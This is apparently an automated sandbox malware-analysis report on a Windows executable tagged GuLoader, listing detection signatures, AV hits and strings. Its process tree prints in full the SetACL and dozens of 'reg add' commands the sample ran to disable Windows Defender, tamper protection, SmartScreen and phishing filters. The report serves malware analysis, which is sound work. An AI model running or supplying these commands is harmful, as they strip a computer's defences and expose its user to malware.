Windows Analysis Report
Ptmhbplhxb.exe

Overview

General Information

Sample Name: Ptmhbplhxb.exe
Original Sample Name: 92189d2d76db2a5549f25e35a52a2451.exe
Analysis ID: 1284605
MD5: 92189d2d76db2a5549f25e35a52a2451
SHA1: 59708813a1744a959c35a0412f4bd2cae862ffa0
SHA256: b9fdbe8b2868d78c2fbe632a82d102bf5b334b256d21565e3173ba8ebe169ba5
Tags: exe, GuLoader

Detection

Score: 60
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Multi AV Scanner detection for dropped file
Submitted sample is a known malware sample
Uses cmd line tools excessively to alter registry or file data
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Too many similar processes found
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Uses reg.exe to modify the Windows registry
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • Ptmhbplhxb.exe (PID: 2600 cmdline: C:\Users\user\Desktop\Ptmhbplhxb.exe MD5: 92189D2D76DB2A5549F25E35A52A2451)
    • cmd.exe (PID: 7152 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp\do32.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 3840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • SetACL32.exe (PID: 5788 cmdline: SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators" MD5: 93B828ED97CB2C701364DF520DDD5331)
      • SetACL32.exe (PID: 2028 cmdline: SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full" MD5: 93B828ED97CB2C701364DF520DDD5331)
      • SetACL32.exe (PID: 7076 cmdline: SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators" MD5: 93B828ED97CB2C701364DF520DDD5331)
      • SetACL32.exe (PID: 5412 cmdline: SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full" MD5: 93B828ED97CB2C701364DF520DDD5331)
      • SetACL32.exe (PID: 5228 cmdline: SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators" MD5: 93B828ED97CB2C701364DF520DDD5331)
      • SetACL32.exe (PID: 7100 cmdline: SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full" MD5: 93B828ED97CB2C701364DF520DDD5331)
      • SetACL32.exe (PID: 3624 cmdline: SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators" MD5: 93B828ED97CB2C701364DF520DDD5331)
      • SetACL32.exe (PID: 5916 cmdline: SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full" MD5: 93B828ED97CB2C701364DF520DDD5331)
      • reg.exe (PID: 5628 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5376 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 2028 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 984 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 1752 cmdline: reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 7104 cmdline: reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 7052 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 7148 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5636 cmdline: reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 2380 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5416 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5368 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5380 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 7076 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5068 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 7128 cmdline: reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 7164 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 6856 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5788 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5628 cmdline: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5008 cmdline: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 3576 cmdline: reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5412 cmdline: reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 1540 cmdline: reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 7084 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 7160 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 4732 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 3624 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5788 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 2380 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5628 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "LocalSettingOverridePurgeItemsAfterDelay" /t reg_DWORD /d "0" /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: Ptmhbplhxb.exe | ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\PowerRun.exe | ReversingLabs: Detection: 32%
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\PowerRun.exe | Virustotal: Detection: 32%
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\gafvvkhmsfjamrm.exe | Virustotal: Detection: 17%
Source: Ptmhbplhxb.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Ptmhbplhxb.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Code\SetACL3\Source\SetACL.exe\Win32\Release\SetACL.pdbI source: SetACL32.exe, 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000003.00000000.337990441.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000002.339317693.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000000.338670172.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000002.340772925.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000000.339891186.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000002.341509192.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000000.340983275.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000000.341713280.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000002.342214867.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000002.342983342.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000000.342556211.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000000.343532858.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000002.344356019.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000002.345325623.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000000.344643979.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe.0.dr
Source: Binary string: D:\Code\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdbG source: SetACL64.exe.0.dr
Source: Binary string: D:\Code\SetACL3\Source\SetACL.exe\Win32\Release\SetACL.pdb source: SetACL32.exe, 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000003.00000000.337990441.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000002.339317693.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000000.338670172.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000002.340772925.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000000.339891186.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000002.341509192.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000000.340983275.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000000.341713280.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000002.342214867.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000002.342983342.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000000.342556211.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000000.343532858.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000002.344356019.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000002.345325623.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000000.344643979.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe.0.dr
Source: Binary string: D:\Code\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdb source: SetACL64.exe.0.dr
Source: C:\Users\user\Desktop\Ptmhbplhxb.exe | Code function: 0_2_00406268 FindFirstFileA,FindClose
Source: C:\Users\user\Desktop\Ptmhbplhxb.exe | Code function: 0_2_0040572D GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\Ptmhbplhxb.exe | Code function: 0_2_004026F8 FindFirstFileA
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe | Code function: 3_2_00F74BF0 std::locale::_Init,std::locale::_Init,FindFirstFileW,GetLastError,FindNextFileW,FindClose,std::locale::_Init,std::locale::_Init,std::locale::_Init,std::locale::_Init,std::locale::_Init,std::locale::_Init,std::locale::_Init,std::locale::_Init,std::locale::_Init,std::locale::_Init,std::locale::_Init,std::locale::_Init,std::locale::_Init,RegConnectRegistryW,RegOpenKeyExW,RegCreateKeyExW,RegCloseKey,RegCloseKey
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe | Code function: 3_2_00F840D0 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe | Code function: 3_2_00F9F7A1 FindFirstFileExW
Source: Ptmhbplhxb.exe, 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: Ptmhbplhxb.exe, 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: Ptmhbplhxb.exe, 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: Ptmhbplhxb.exe, 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: PowerRun.exe.0.dr, PowerRun64.exe.0.dr | String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: PowerRun.exe.0.dr, PowerRun64.exe.0.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: PowerRun.exe.0.dr, PowerRun64.exe.0.dr | String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: Ptmhbplhxb.exe, 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: Ptmhbplhxb.exe, 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: Ptmhbplhxb.exe, 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Ptmhbplhxb.exe, 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: Ptmhbplhxb.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Ptmhbplhxb.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Ptmhbplhxb.exe, 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.dr | String found in binary or memory: http://ocsp.comodoca.com0
Source: Ptmhbplhxb.exe, 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.dr | String found in binary or memory: http://ocsp.digicert.com0C
Source: Ptmhbplhxb.exe, 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.dr | String found in binary or memory: http://ocsp.digicert.com0O
Source: PowerRun.exe.0.dr, PowerRun64.exe.0.dr | String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: PowerRun.exe.0.dr, PowerRun64.exe.0.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: PowerRun.exe.0.dr, PowerRun64.exe.0.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: PowerRun.exe.0.dr, PowerRun64.exe.0.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: Ptmhbplhxb.exe, 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.dr | String found in binary or memory: http://www.digicert.com/CPS0
Source: SetACL32.exe, SetACL32.exe, 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000003.00000000.337990441.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000002.339317693.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000000.338670172.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000002.340772925.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000000.339891186.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000002.341509192.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000000.340983275.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000000.341713280.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000002.342214867.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000002.342983342.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000000.342556211.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000000.343532858.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000002.344356019.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000002.345325623.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000000.344643979.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.dr | String found in binary or memory: https://helgeklein.com
Source: SetACL32.exe, SetACL32.exe, 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000003.00000000.337990441.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000002.339317693.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000000.338670172.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000002.340772925.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000000.339891186.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000002.341509192.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000000.340983275.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000000.341713280.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000002.342214867.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000002.342983342.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000000.342556211.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000000.343532858.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000002.344356019.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000002.345325623.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000000.344643979.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.dr | String found in binary or memory: https://helgeklein.com.
Source: SetACL32.exe, SetACL32.exe, 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000003.00000000.337990441.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000002.339317693.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000000.338670172.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000002.340772925.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000000.339891186.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000002.341509192.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000000.340983275.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000000.341713280.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000002.342214867.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000002.342983342.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000000.342556211.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000000.343532858.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000002.344356019.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000002.345325623.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000000.344643979.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.dr | String found in binary or memory: https://helgeklein.com/setacl/documentation/command-line-version-setacl-exe
Source: Ptmhbplhxb.exe, 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.dr | String found in binary or memory: https://www.digicert.com/CPS0
Source: PowerRun64.exe.0.dr | String found in binary or memory: https://www.globalsign.com/repository/0
Source: C:\Users\user\Desktop\Ptmhbplhxb.exe | Code function: 0_2_004051CA GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard
Source: reg.exe | Process created: 69

System Summary

Source: C:\Users\user\Desktop\Ptmhbplhxb.exe | Dropped file: MD5: b38561661a7164e3bbb04edc3718fe89 Family: Chafer Alias: APT39, Chafer Description: Chafer's (also known as APT39) focus on the telecommunications and travel industries suggests an intent to perform monitoring, tracking, or surveillance operations against specific individuals. While its targeting scope is global, the activities are concentrated in the Middle East. Its targeting of government entities suggests a potential secondary intent to collect geopolitical data that may benefit nation-state decision making. References: https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html https://mp.weixin.qq.com/s/c2z4laJ0oq5y0BAEFM3Y9w | Data Source: https://github.com/RedDrip7/APT_Digital_Weapon
Source: Ptmhbplhxb.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\Ptmhbplhxb.exe | Code function: 0_2_004031F1 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\Ptmhbplhxb.exe | Code function: 0_2_00406742
Source: C:\Users\user\Desktop\Ptmhbplhxb.exe | Code function: 0_2_00404A09
Source: C:\Users\user\Desktop\Ptmhbplhxb.exe | Code function: 0_2_00406F19
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe | Code function: 3_2_00F92393
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe | Code function: 3_2_00F74BF0
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe | Code function: 3_2_00F76F69
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe | Code function: 3_2_00F840D0
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe | Code function: 3_2_00F92161
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe | Code function: 3_2_00F9C508
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe | Code function: 3_2_00F94650
